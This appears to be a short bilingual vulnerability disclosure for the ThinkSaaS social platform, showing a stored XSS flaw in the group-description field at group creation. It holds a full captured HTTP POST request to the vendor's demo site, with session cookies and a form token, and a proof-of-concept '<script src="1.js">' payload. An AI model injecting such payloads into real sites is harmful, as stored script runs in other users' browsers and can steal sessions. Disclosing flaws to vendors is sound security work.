存储型xss2（需要注册登录）/ Storage type XSS2（Need to register and log in）

[MIMAZHAN]

当添加小组时：https://demo.thinksaas.cn/group/create/
When the group is added:https://demo.thinksaas.cn/group/create/

修改小组介绍时：
When the revision of the panel:

POST /index.php?app=group&ac=create&ts=do HTTP/1.1
Host: demo.thinksaas.cn
Connection: close
Content-Length: 620
Cache-Control: max-age=0
Origin: https://demo.thinksaas.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWEZvXgMRfRnvrT3s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Referer: https://demo.thinksaas.cn/group/create/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=1agufb6os5sik9vb5onfcr0vs4; ts_email=admin%40mimaz.org; ts_autologin=c9qrjmbdwf4kw4ok4okoc0ggc84g8gc; Hm_lvt_5964cd4b8810fcc73c98618d475213f6=1533621094,1533625100,1533625361,1533625712; Hm_lpvt_5964cd4b8810fcc73c98618d475213f6=1533625993

------WebKitFormBoundaryWEZvXgMRfRnvrT3s
Content-Disposition: form-data; name="groupname"

name1
------WebKitFormBoundaryWEZvXgMRfRnvrT3s
Content-Disposition: form-data; name="groupdesc"

describe1<script src="1.js">
------WebKitFormBoundaryWEZvXgMRfRnvrT3s
Content-Disposition: form-data; name="photo"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundaryWEZvXgMRfRnvrT3s
Content-Disposition: form-data; name="tag"

Label1
------WebKitFormBoundaryWEZvXgMRfRnvrT3s
Content-Disposition: form-data; name="token"

ff94d70c0394174b299ac1c1efc5ccd539fc484e
------WebKitFormBoundaryWEZvXgMRfRnvrT3s--

在groupdesc参数端未过滤恶意代码，造成注入。
The malicious code is not filtered at the groupdesc parameter end, causing injection.

POC：<script src="1.js">

官方举例：https://demo.thinksaas.cn/group/show/54/
Official examples:https://demo.thinksaas.cn/group/show/54/